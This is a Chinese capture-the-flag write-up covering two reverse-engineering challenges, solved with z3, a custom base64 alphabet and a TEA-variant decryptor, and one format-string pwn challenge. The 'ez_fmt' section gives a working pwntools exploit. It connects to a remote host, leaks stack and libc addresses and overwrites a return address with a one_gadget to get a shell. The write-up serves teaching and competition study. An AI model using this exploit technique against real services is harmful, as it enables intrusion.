__int64 __fastcall main(int a1,char**a2,char**a3){int v3;// eaxunsignedint v4;// eaxint v5;// eaxsize_t v6;// raxint v7;// edxunsignedint v8;// eaxint v9;// eaxint v10;// eaxint v11;// eaxsize_t v12;// raxint v13;// ecxint v14;// eaxint v16;// [rsp+128h] [rbp-118h]int v17;// [rsp+12Ch] [rbp-114h]int v18;// [rsp+130h] [rbp-110h]int v19;// [rsp+134h] [rbp-10Ch]int v20;// [rsp+138h] [rbp-108h]int v21;// [rsp+13Ch] [rbp-104h]char v22[64];// [rsp+140h] [rbp-100h] BYREFchar v23[64];// [rsp+180h] [rbp-C0h] BYREFchar v24[64];// [rsp+1C0h] [rbp-80h] BYREFchar s[52];// [rsp+200h] [rbp-40h] BYREFunsignedint v26;// [rsp+234h] [rbp-Ch]size_t v27;// [rsp+238h] [rbp-8h]
v26 =0;printf("Welcome to the CTF world:");memset(s,0,0x32uLL);__isoc99_scanf("%s", s);
v27 =strlen(s);
v16 =1111065332;while(1){while(1){while(1){while(1){while(1){while(1){while(1){while( v16 ==-1884415306)
v16 =874394363;if( v16 !=-1610796817)break;
v5 =951531691;if( v21 <4)
v5 =-123677562;
v16 = v5;}if( v16 !=-1571665377)break;
v8 =strlen(v22);sub_401980(v22, v23, v8);memset(v22,0,0x32uLL);memcpy(v22, v23,0x32uLL);
v16 =-1884415306;}if( v16 !=-1125271585)break;
v16 =502592025;}if( v16 !=-1034568323)break;++v17;
v16 =359215778;}if( v16 !=-728174227)break;printf("wrong!");
v26 =0;
v16 =-88181297;}if( v16 ==-139558179){printf("Wrong!");exit(-1);}if( v16 !=-123677562)break;srand(byte_406132);
v6 =strlen((constchar*)(unsignedint)byte_406130);sub_401D10(byte_406130, v6);
v7 =1367925527;if((v21 &1)!=0)
v7 =-1571665377;
v16 = v7;}if( v16 ==-88181297)break;switch( v16 ){case178472351:sub_402EE0(byte_406130,&byte_406130[v20]);
v19 =0;
v16 =244862061;break;case201400792:
v16 =-1034568323;break;case244862061:
v10 =1368236239;if( v19 < v20 )
v10 =1736470037;
v16 = v10;break;case282724921:
v4 =strlen(s);
v21 =0;
v16 =-1610796817;sub_401980(s, v22, v4);break;case359215778:
v12 =strlen(v23);
v13 =2026466323;if( v17 < v12 )
v13 =1003071928;
v16 = v13;break;case384994120:
v11 =-1125271585;if( v18 < v20 )
v11 =1105882884;
v16 = v11;break;case502592025:sub_401EB0(v23, v24);
v17 =0;
v16 =359215778;break;case728190549:
v18 =0;
v16 =384994120;break;case874394363:++v21;
v16 =-1610796817;break;case951531691:
v9 =728190549;
v20 =64;if( dword_4062C0 ==1)
v9 =178472351;
v16 = v9;break;case1003071928:
v14 =201400792;if( byte_406180[v17]!= v24[v17])
v14 =-728174227;
v16 = v14;break;case1105882884:
byte_406130[v18]^=0x27u;
v16 =1837459842;break;case1111065332:
v3 =282724921;if( v27 !=34)
v3 =-139558179;
v16 = v3;break;case1367925527:sub_401250(v22, v23);memset(v22,0,0x32uLL);memcpy(v22, v23,0x32uLL);
v16 =-1884415306;break;case1368236239:
v16 =502592025;break;case1558803342:++v19;
v16 =244862061;break;case1736470037:
byte_406130[v19]=(5*(byte_406130[v19]+3))^0x15;
v16 =1558803342;break;case1837459842:++v18;
v16 =384994120;break;default:printf("right!");
v26 =0;
v16 =-88181297;break;}}return v26;}
接收用户输入的字符串,并对其进行一系列复杂的操作和检查。这些操作和检查是通过一个嵌套的while循环和switch语句实现的,这个循环和语句的控制流程由一个状态变量v16控制。
在这个循环和语句中,根据v16的值,程序会执行不同的操作,包括调用一些未在这段代码中定义的函数(如sub_401980、sub_401D10等)、改变v16的值、改变其他变量的值等。
然后在这找加密方式找了好久,后来无意中发现了这个
先去除平坦混淆(https://github.com/cq674350529/deflat),然后分析加密:
先base然后异或,提取字符解:
from z3 import Solver, BitVec, sat
# 创建一个Solver对象
s = Solver()# 创建一个长度为48的列表,列表中的每个元素都是一个8位的BitVec对象# BitVec对象的名称是它们在列表中的索引
needdd =[BitVec("%d"% i,8)for i inrange(48)]# 给定字节列表cmp=[0x3A,0x2C,0x4B,0x51,0x68,0x46,0x59,0x63,0x24,0x04,0x5E,0x5F,0x00,0x0C,0x2B,0x03,0x29,0x5C,0x74,0x70,0x6A,0x62,0x7F,0x3D,0x2C,0x4E,0x6F,0x13,0x06,0x0D,0x06,0x0C,0x4D,0x56,0x0F,0x28,0x4D,0x51,0x76,0x70,0x2B,0x05,0x51,0x68,0x48,0x55,0x24,0x19]# 生成异或值列表
table =[0x53,0x46,0x4E,0x72,0x49,0x42,0x6D,0x6E,0x4F,0x4C,0x10,0x56,0x74,0x7E,0x62,0x4D,0x63,0x16,0x6C,0x4A,0x1E]# 初始化变量v7
v7 =2023for i inrange(47):# 根据i的值,使用不同的方式更新v7,并从table中取出一个值与needdd[i]进行异或操作if i %3==1:
v7 =(v7 +5)%20
v3 = table[v7 +1]elif i %3==2:
v7 =(v7 +7)%19
v3 = table[v7 +2]else:
v7 =(v7 +3)%17
v3 = table[v7 +3]# 将needdd[i]与v3进行异或操作,并将结果存回needdd[i]
needdd[i]= needdd[i]^ v3
# 将needdd[i]的值存储在v4中
v4 = needdd[i]
i +=1# v4与下一个needdd[i]进行异或操作,并将结果存回needdd[i]
needdd[i]= v4 ^ needdd[i]# 为Solver添加约束条件,即needdd列表中的每个元素都必须与cmp列表中对应的元素相等for i inrange(48):
s.add(cmp[i]== needdd[i])# 检查是否存在满足所有约束条件的解if s.check()== sat:# 如果存在解则输出
model = s.model()print(model)
输出:
[26=76,
8=87,
0=87,
33=82,
34=55,
44=110,
42=68,
2=113,
12=79,
3=83,
16=102,
28=107,
38=55,
14=105,
27=108,
29=69,
22=83,
9=66,
43=71,
11=108,
1=90,
25=116,
19=106,
24=115,
4=87,
18=97,
20=87,
31=70,
45=112,
32=87,
46=61,
30=102,
13=114,
17=99,
10=76,
36=47,
15=69,
21=66,
7=116,
23=82,
39=100,
35=106,
5=99,
47=61,
40=77,
41=67,
37=82,
6=85]
变异base64按顺序加解密:
l+USN4J5Rfj0TaVOcnzXiPGZIBpoAExuQtHyKD692hwmqe7/Mgk8v1sdCW3bYFLr
FGseVD3ibtHWR1czhLnUfJK6SEZ2OyPAIpQoqgY0w49u+7rad5CxljMXvNTBkm/8
Hc0xwuZmy3DpQnSgj2LhUtrlVvNYks+BX/MOoETaKqR4eb9WF8ICGzf6id1P75JA
pnHQwlAveo4DhGg1jE3SsIqJ2mrzxCiNb+Mf0YVd5L8c97/WkOTtuKFZyRBUPX6a
plxXOZtaiUneJIhk7qSYEjD1Km94o0FTu52VQgNL3vCBH8zsA/b+dycGPRMwWfr6
解密:
import base64
defcustom_b64decode(s, custom_alphabet):
standard_alphabet ='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'# 创建一个翻译表
translation_table =str.maketrans(custom_alphabet, standard_alphabet)# 将自定义base64编码的字符串翻译成标准base64编码的字符串
standard_b64encoded = s.translate(translation_table)# 添加必要的填充字符
padding_needed =4-len(standard_b64encoded)%4if padding_needed:
standard_b64encoded +='='* padding_needed
# 解码标准base64编码的字符串return base64.b64decode(standard_b64encoded)# 自定义的base64 Alphabet
custom_alphabet ='l+USN4J5Rfj0TaVOcnzXiPGZIBpoAExuQtHyKD692hwmqe7/Mgk8v1sdCW3bYFLr'# 要解密的密文
encoded_string ='B6gtBdq8BGN1VX+yIdECBGt9a8N1TyIvB9hCo9hDA543uc'# 解密操作
decoded_bytes = custom_b64decode(encoded_string, custom_alphabet)
decoded_string = decoded_bytes.decode('utf-8')print(decoded_string)
flag{3ea590ccwxehg715264fzxnzepqz}
ez_fmt
给定了输入的堆栈地址和格式化字符串漏洞,我们可以修改任何地址。但是,程序执行完毕后,w会被设置为0,这使得下一次利用变得更加困难。因此,我们需要在w被设置为0之前进行操作。
我们可以修改printf的返回地址。同时,由于printf函数需要堆栈对齐,所以返回地址应该被设置为0x4011ED。此外,我们还需要泄露出libc地址,以便进行第二次利用,将函数的返回地址修改为one_gadget。
from pwn import*# 设置pwntools的上下文环境为Linux amd64
context(os='linux', arch='amd64', log_level='debug')#p = process('./ez_fmt')
p = remote('47.104.24.40',1337)# 加载本地的二进制文件和libc文件
elf = ELF('./ez_fmt')
libc = ELF('./libc-2.31.so')# 接收直到遇到"0x",然后读取12个字符,转换为栈地址
p.recvuntil("0x")
stack=int(p.recv(12),16)print(hex(stack))# 构造payload,用于修改栈上的值
pay=b'%4589c%11$hn%19$p'.ljust(0x28,b'\x00')+p64(stack-8)
p.send(pay)# 再次接收直到"0x",读取12个字符,计算libc基地址
p.recvuntil("0x")
libc_base=int(p.recv(12),16)-libc.sym['__libc_start_main']-243print(hex(libc_base))# 计算one_gadget的地址
one_gadget=libc_base+0xe3b01
p.recvuntil("\n")# 计算one_gadget的低16位
one_gadget_low = one_gadget&0xffff# 计算one_gadget的高16位
one_gadget_high =(one_gadget>>16)&0xffff# 构造格式化字符串,用于写入one_gadget的低16位
fmt_low =b'%'+str(one_gadget_low).encode()+b'c%10$hn'# 构造格式化字符串,用于写入one_gadget的高16位
fmt_high =b'%'+str(((one_gadget>>16)&0xffff)-(one_gadget_low)).encode()+b'c%11$hn'# 将两个格式化字符串连接起来,然后用'\x00'填充到0x20字节
fmt_str =(fmt_low+fmt_high).ljust(0x20,b'\x00')# 计算要写入的内存地址
addr_low = p64(stack+0x68)
addr_high = p64(stack+0x68+2)# 构造最终payload
pay=fmt_str+addr_low+addr_high
p.send(pay)
p.interactive()
Babyre
发现有TLS
__int64 __fastcall TlsCallback_1_0(__int64 a1,char a2){
__int64 v2;// rcxstruct_PEB*v3;// rax
__int64 result;// raxint i;// [rsp+44h] [rbp+24h]sub_14001138E(&unk_1400240F4);
v3 =NtCurrentPeb();LOBYTE(v3)= v3->BeingDebugged;if((_BYTE)v3 ==1){LOBYTE(v2)= v3->BeingDebugged;sub_140011AE0(v2);}
result = a2 &1;if((a2 &1)!=0){for( i =0; i <32;++i ){*((_BYTE *)off_14001E060 + i +1)^= i;
result =(unsignedint)(i +1);}}return result;}
__int64 sub_140012050(){
char *v0;// rdi
__int64 i;// rcx
char v3[32];//[rsp+0h][rbp-20h] BYREF
char v4;//[rsp+20h][rbp+0h] BYREF
_DWORD v5[15];//[rsp+28h][rbp+8h] BYREF
int j;//[rsp+64h][rbp+44h]int k;//[rsp+84h][rbp+64h]
v0 =&v4;for( i = 34i64; i;--i ){*(_DWORD *)v0 =-858993460;
v0 +=4;}
sub_14001138E((__int64)&unk_1400240F4);
sub_1400111A9((__int64)&unk_14001AD78);
sub_14001123F(aPleaseInputYou);
std::istream::getline(std::cin, Str, 33i64);if( j_strlen(Str)==32){
memset(v5,0, 0x20ui64);
sub_140011019((__int64)v5,(__int64)Str);for( j =0; j <4;++j )
sub_14001106E(&v5[2* j],&v5[2* j +1]);
sub_140011087((__int64)v5,(__int64)byte_14001E218);for( k =0; k <32;++k ){if( byte_14001E040[k]!= byte_14001E218[k]){
sub_14001123F(aNoNoNo);
sub_1400111A9((__int64)"%d");
goto LABEL_15;}}
sub_14001123F(aYes);}else{
sub_1400111A9((__int64)"Wrong Length!");}
LABEL_15:
sub_140011325(v3,&unk_14001AD30);return 0i64;}
最后exp:
#include<stdio.h>#include<stdint.h>// 定义解密函数,使用TEA算法的变种进行解密voiddecrypt(uint32_t v[2],uint32_tconst key[4]){unsignedint i,j;// 初始化变量,v0和v1为要解密的数据,delta为一个常数,sum为解密过程中使用的累加变量uint32_t v0=v[0], v1=v[1], delta=0x88408067, sum=0xd192c263;// 进行32轮解密操作for(i=0;i<4;i++){for(j=0;j<33;j++){// 每轮解密中减去delta更新sum值
sum-=delta;// 根据TEA算法变种进行解密的核心步骤
v1-=(((v0<<5)^(v0>>4))+v0)^(sum+key[(sum>>11)&3]);
v0-=(((v1<<5)^(v1>>4))+v1)^(sum+key[sum&3])^sum;}}// 将解密后的数据写回原数组
v[0]=v0;
v[1]=v1;}intmain(){// 初始化要解密的数据数组uint32_t array[8]={0x9523F2E0,0x8ED8C293,0x8668C393,0xDDF250BC,0x510E4499,0x8C60BD44,0x34DCABF2,0xC10FD260};// 初始化密钥uint32_t key[4]={0x62,0x6F,0x6D,0x62};// 循环解密数组中的每对数据for(int i=0;i<8;i+=2){uint32_t temp[2];// 取出一对数据
temp[0]=array[i];
temp[1]=array[i +1];// 调用解密函数decrypt(temp, key);// 打印解密后的数据,每个uint32_t解密后为4个字符printf("%c%c%c%c%c%c%c%c",(char)(temp[0]>>0),(char)(temp[0]>>8),(char)(temp[0]>>16),(char)(temp[0]>>24),(char)(temp[1]>>0),(char)(temp[1]>>8),(char)(temp[1]>>16),(char)(temp[1]>>24));}return0;}
flag{W31com3_2_Th3_QwbS7_4nd_H4v3_Fun}
版权归原作者 tan 91 所有, 如有侵权,请联系我们删除。